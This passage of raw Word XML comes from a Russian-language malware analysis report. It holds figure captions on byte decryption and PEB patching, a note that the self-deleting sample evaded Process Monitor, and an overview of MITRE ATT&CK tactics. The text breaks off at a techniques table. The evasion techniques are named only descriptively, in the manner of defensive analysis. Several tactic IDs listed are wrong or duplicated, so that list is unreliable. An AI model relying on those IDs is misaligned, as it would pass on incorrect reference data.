            <wp:extent cx="4320540" cy="311869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688" cy="311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129D" w14:textId="5C387D8C" w:rsidR="00115699" w:rsidRPr="00115699" w:rsidRDefault="00115699" w:rsidP="00115699">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00115699">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="00115699">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0011569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15699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25</w:t>
      </w:r>
      <w:r w:rsidRPr="00115699">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00115699">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Дешифровка и загрузка байт</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467BEB30" w14:textId="77777777" w:rsidR="00115699" w:rsidRDefault="00115699" w:rsidP="00115699">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:left="851" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00115699">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36D276EE" wp14:editId="32180FC3">
            <wp:extent cx="4740910" cy="34211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4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66BE" w14:textId="3E9D3B4E" w:rsidR="00115699" w:rsidRDefault="00115699" w:rsidP="00115699">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00115699">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="00115699">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0011569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15699">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CC19CF">
        <w:rPr>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>26</w:t>
      </w:r>
      <w:r w:rsidRPr="00115699">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00115699">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Патчинг в </w:t>
      </w:r>
      <w:r w:rsidRPr="00115699">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PEB</w:t>
      </w:r>
      <w:r w:rsidRPr="00115699">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> текущего процесса</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1384EF08" w14:textId="552A0884" w:rsidR="00CC19CF" w:rsidRPr="00CC19CF" w:rsidRDefault="00CC19CF" w:rsidP="00CC19CF">
      <w:r>
        <w:t xml:space="preserve">Далее была попытка запуска файла на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VM</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC19CF">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Для этого сначала были настроены фильтры в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Process</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC19CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Monitor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC19CF">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCB51D8" w14:textId="77777777" w:rsidR="00CC19CF" w:rsidRDefault="00613AA4" w:rsidP="00CC19CF">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00613AA4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69344497" wp14:editId="60CDE585">
            <wp:extent cx="4389120" cy="373112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9383" cy="37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12D5" w14:textId="6D9EB476" w:rsidR="00115699" w:rsidRPr="00CC19CF" w:rsidRDefault="00CC19CF" w:rsidP="00CC19CF">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC19CF">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC19CF">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00CC19CF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C19CF">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00CC19CF">
        <w:rPr>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>27</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC19CF">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00CC19CF">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Фильтры для захвата процессов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31987972" w14:textId="3FA15BA3" w:rsidR="00613AA4" w:rsidRDefault="00CC19CF" w:rsidP="00CC19CF">
      <w:r>
        <w:t xml:space="preserve">Однако при запуске после самоудаления файла никакие действия в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Process</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Monitor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC19CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">не показывались. Это может свидетельствовать о проверке на </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>анти-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или того, что файл использует прямые системные вызовы (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nt</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC19CF">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC19CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">не </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinAPI</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC19CF">
        <w:t>).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD6A1C1" w14:textId="674BC48D" w:rsidR="00E04CD8" w:rsidRPr="00B249CD" w:rsidRDefault="00E04CD8" w:rsidP="00B249CD">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc214273120"/>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Классификация </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MITRE</w:t>
      </w:r>
      <w:r w:rsidRPr="003B55D2">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ATT</w:t>
      </w:r>
      <w:r w:rsidRPr="003B55D2">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CK</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="339760C6" w14:textId="1B7C1B7A" w:rsidR="00B249CD" w:rsidRDefault="004A3DA9" w:rsidP="00B249CD">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK (Adversarial</w:t>
      </w:r>
      <w:r w:rsidR="00B249CD" w:rsidRPr="00B249CD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tactics &amp; </w:t>
      </w:r>
      <w:r w:rsidR="008E634E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Techniques &amp; Common Knowledge) </w:t>
      </w:r>
      <w:r w:rsidR="008E634E" w:rsidRPr="008E634E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00B249CD" w:rsidRPr="00B249CD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B249CD">
        <w:t>это</w:t>
      </w:r>
      <w:r w:rsidR="00B249CD" w:rsidRPr="00B249CD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B249CD">
        <w:t>открытый</w:t>
      </w:r>
      <w:r w:rsidR="00B249CD" w:rsidRPr="00B249CD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B249CD">
        <w:t>фреймворк</w:t>
      </w:r>
      <w:r w:rsidR="00B249CD" w:rsidRPr="00B249CD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B249CD">
        <w:t>для</w:t>
      </w:r>
      <w:r w:rsidR="00B249CD" w:rsidRPr="00B249CD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B249CD">
        <w:t>описания</w:t>
      </w:r>
      <w:r w:rsidR="00B249CD" w:rsidRPr="00B249CD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B249CD">
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="00B249CD" w:rsidRPr="00B249CD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B249CD">
        <w:t>классификации</w:t>
      </w:r>
      <w:r w:rsidR="00B249CD" w:rsidRPr="00B249CD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B249CD">
        <w:t>поведения</w:t>
      </w:r>
      <w:r w:rsidR="00B249CD" w:rsidRPr="00B249CD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B249CD">
        <w:t>киберугроз</w:t>
      </w:r>
      <w:r w:rsidR="00B249CD" w:rsidRPr="00B249CD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00B249CD">
        <w:t>разработанный</w:t>
      </w:r>
      <w:r w:rsidR="00B249CD" w:rsidRPr="00B249CD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B249CD">
        <w:t>некоммерческой</w:t>
      </w:r>
      <w:r w:rsidR="00B249CD" w:rsidRPr="00B249CD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B249CD">
        <w:t>организацией</w:t>
      </w:r>
      <w:r w:rsidR="00B249CD" w:rsidRPr="00B249CD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> MITRE Corporation (</w:t>
      </w:r>
      <w:r w:rsidR="00B249CD">
        <w:t>США</w:t>
      </w:r>
      <w:r w:rsidR="00B249CD" w:rsidRPr="00B249CD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00B249CD">
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidR="00B249CD" w:rsidRPr="00B249CD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2013 </w:t>
      </w:r>
      <w:r w:rsidR="00B249CD">
        <w:t>году</w:t>
      </w:r>
      <w:r w:rsidR="00B249CD" w:rsidRPr="00B249CD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00B249CD">
        <w:t>Он</w:t>
      </w:r>
      <w:r w:rsidR="00B249CD" w:rsidRPr="00B249CD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B249CD">
        <w:t>используется</w:t>
      </w:r>
      <w:r w:rsidR="00B249CD" w:rsidRPr="00B249CD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B249CD">
        <w:t>аналитиками</w:t>
      </w:r>
      <w:r w:rsidR="00B249CD" w:rsidRPr="00B249CD">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00B249CD">
        <w:t>компаниями</w:t>
      </w:r>
      <w:r w:rsidR="00B249CD" w:rsidRPr="00B249CD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B249CD">
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="00B249CD" w:rsidRPr="00B249CD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B249CD">
        <w:t>правительствами</w:t>
      </w:r>
      <w:r w:rsidR="00B249CD" w:rsidRPr="00B249CD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B249CD">
        <w:t>для</w:t>
      </w:r>
      <w:r w:rsidR="00B249CD" w:rsidRPr="00B249CD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B249CD">
        <w:t>стандартизации</w:t>
      </w:r>
      <w:r w:rsidR="00B249CD" w:rsidRPr="00B249CD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B249CD">
        <w:t>анализа</w:t>
      </w:r>
      <w:r w:rsidR="00B249CD" w:rsidRPr="00B249CD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B249CD">
        <w:t>атак</w:t>
      </w:r>
      <w:r w:rsidR="00B249CD" w:rsidRPr="00B249CD">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00B249CD">
        <w:t>включая</w:t>
      </w:r>
      <w:r w:rsidR="00B249CD" w:rsidRPr="00B249CD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B249CD" w:rsidRPr="00B249CD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>APT</w:t>
      </w:r>
      <w:r w:rsidR="00B249CD" w:rsidRPr="00B249CD">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00B249CD">
        <w:t>Фреймворк не просто "список уязвимостей", а матрица тактик и техник, которая моделирует полный цикл атаки (kill chain) от разведки до воздействия.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D73E3F9" w14:textId="49CCEA58" w:rsidR="00B249CD" w:rsidRPr="00B249CD" w:rsidRDefault="00B249CD" w:rsidP="00B249CD">
      <w:r>
        <w:t>Основная структура MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r w:rsidRPr="00B249CD">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FD8BF1" w14:textId="7B0011F9" w:rsidR="00B249CD" w:rsidRDefault="00B249CD" w:rsidP="00055639">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Тактики (Tactics): Это вы</w:t>
      </w:r>
      <w:r w:rsidR="008E634E">
        <w:t>сокоуровневые цели атакующего. Каждая тактика -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> этап атаки. Примеры:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EE7725" w14:textId="77777777" w:rsidR="00B249CD" w:rsidRDefault="00B249CD" w:rsidP="00B249CD">
      <w:r>
        <w:t>TA0001: Reconnaissance (Разведка): Сбор инфы о цели (e.g., сканирование портов).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055D6AB6" w14:textId="77777777" w:rsidR="00B249CD" w:rsidRDefault="00B249CD" w:rsidP="00B249CD">
      <w:r>
        <w:t>TA0002: Resource Development (Разработка ресурсов): Создание инструментов (e.g., домены для C2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD3784B" w14:textId="77777777" w:rsidR="00B249CD" w:rsidRDefault="00B249CD" w:rsidP="00B249CD">
      <w:r>
        <w:t>TA0003: Initial Access (Начальный доступ): Проникновение (e.g., phishing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABACD95" w14:textId="77777777" w:rsidR="00B249CD" w:rsidRDefault="00B249CD" w:rsidP="00B249CD">
      <w:r>
        <w:t>TA0004: Execution (Выполнение): Запуск кода (e.g., через cmd).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6D9C2D" w14:textId="77777777" w:rsidR="00B249CD" w:rsidRDefault="00B249CD" w:rsidP="00B249CD">
      <w:r>
        <w:t>TA0005: Persistence (Закрепление): Обеспечение долгой жизни (e.g., автозагрузка).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170D5C64" w14:textId="77777777" w:rsidR="00B249CD" w:rsidRDefault="00B249CD" w:rsidP="00B249CD">
      <w:r>
        <w:t>TA0006: Privilege Escalation (Повышение привилегий): Получение admin-прав.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769E2D56" w14:textId="77777777" w:rsidR="00B249CD" w:rsidRDefault="00B249CD" w:rsidP="00B249CD">
      <w:r>
        <w:t>TA0007: Defense Evasion (Обход защиты): Скрытие (e.g., обфускация).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3E213F" w14:textId="77777777" w:rsidR="00B249CD" w:rsidRDefault="00B249CD" w:rsidP="00B249CD">
      <w:r>
        <w:t>TA0008: Credential Access (Доступ к учёткам): Кража паролей.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438E4208" w14:textId="77777777" w:rsidR="00B249CD" w:rsidRDefault="00B249CD" w:rsidP="00B249CD">
      <w:r>
        <w:t>TA0009: Discovery (Разведка): Сбор инфы о системе (e.g., WMI-queries).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43880612" w14:textId="77777777" w:rsidR="00B249CD" w:rsidRDefault="00B249CD" w:rsidP="00B249CD">
      <w:r>
        <w:t>TA0010: Lateral Movement (Латеральное движение): Переход по сети.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545DC039" w14:textId="77777777" w:rsidR="00B249CD" w:rsidRDefault="00B249CD" w:rsidP="00B249CD">
      <w:r>
        <w:t>TA0011: Collection (Сбор данных): Копирование файлов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA422D3" w14:textId="77777777" w:rsidR="00B249CD" w:rsidRPr="00B249CD" w:rsidRDefault="00B249CD" w:rsidP="00B249CD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B249CD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TA0012: Command and Control (</w:t>
      </w:r>
      <w:r>
        <w:t>Управление</w:t>
      </w:r>
      <w:r w:rsidRPr="00B249CD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">): </w:t>
      </w:r>
      <w:r>
        <w:t>Связь</w:t>
      </w:r>
      <w:r w:rsidRPr="00B249CD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="00B249CD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> C2 (e.g., HTTPS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D8C381" w14:textId="77777777" w:rsidR="00B249CD" w:rsidRDefault="00B249CD" w:rsidP="00B249CD">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>TA0013: Exfiltration (Эксфильтрация): Вывод данных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D1174F" w14:textId="77777777" w:rsidR="00B249CD" w:rsidRDefault="00B249CD" w:rsidP="00B249CD">
      <w:r>
        <w:t>TA0004: Impact (Воздействие): Ущерб (e.g., ransomware).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50781DAC" w14:textId="77777777" w:rsidR="00B249CD" w:rsidRDefault="00B249CD" w:rsidP="00B249CD">
      <w:r>
        <w:t>Всего 14 тактик (на 2025 год; обновляется ежеквартально). Они нелинейны — атака может петлять.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEE5DA6" w14:textId="29873A07" w:rsidR="00D138D9" w:rsidRDefault="00B249CD" w:rsidP="00B249CD">
      <w:r>
        <w:t>Техники (Techniques) и Подтехники (Sub-Techniques): Это конкре</w:t>
      </w:r>
      <w:r w:rsidR="008E634E">
        <w:t>тные методы реализации тактики</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Каждая техника имеет ID (e.g., T1059), описание, примеры, MITRE-группы (e.g., APT28) и платформы (Windows/Linux). Подтехники — уточнения (e.g., T1059.003: Windows Command Shell). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455444EC" w14:textId="77DE5E40" w:rsidR="00777471" w:rsidRPr="00777471" w:rsidRDefault="00777471" w:rsidP="00B249CD">
      <w:r>
        <w:t xml:space="preserve">В таблице 1 представлены технике </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MITRE</w:t>
      </w:r>
      <w:r>
        <w:t>, используемые в исследуемых файлах и общий результат их анализа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E9AD16" w14:textId="4F41B362" w:rsidR="00777471" w:rsidRDefault="00777471" w:rsidP="00777471">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:sectPr w:rsidR="00777471" w:rsidSect="00B87E49">
          <w:footerReference w:type="default" r:id="rId42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57218046" w14:textId="1D51771F" w:rsidR="00B249CD" w:rsidRPr="00777471" w:rsidRDefault="00B249CD" w:rsidP="00B249CD"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af5"/>
        <w:tblW w:w="15043" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="420"/>
        <w:gridCol w:w="1435"/>
        <w:gridCol w:w="1440"/>
        <w:gridCol w:w="2329"/>
        <w:gridCol w:w="3118"/>
        <w:gridCol w:w="2410"/>
        <w:gridCol w:w="2126"/>
        <w:gridCol w:w="1765"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B249CD" w:rsidRPr="00B249CD" w14:paraId="742A7267" w14:textId="77777777" w:rsidTr="00B249CD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="420" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B9D1014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</w:rPr>
              <w:t>№</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1435" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="337EAC67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  <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Название </w:t>
            </w:r>
            <w:r w:rsidRPr="00B249CD">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>компонента</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DA8BCCB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</w:rPr>
              <w:t>Назначение</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2329" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D5F7543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</w:rPr>
              <w:t xml:space="preserve">Вредоносные действия, техники </w:t>
            </w:r>
            <w:r w:rsidRPr="00B249CD">
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>MITRE</w:t>
            </w:r>
            <w:r w:rsidRPr="00B249CD">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B249CD">
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ATT</w:t>
            </w:r>
            <w:r w:rsidRPr="00B249CD">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>&amp;</w:t>
            </w:r>
            <w:r w:rsidRPr="00B249CD">
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
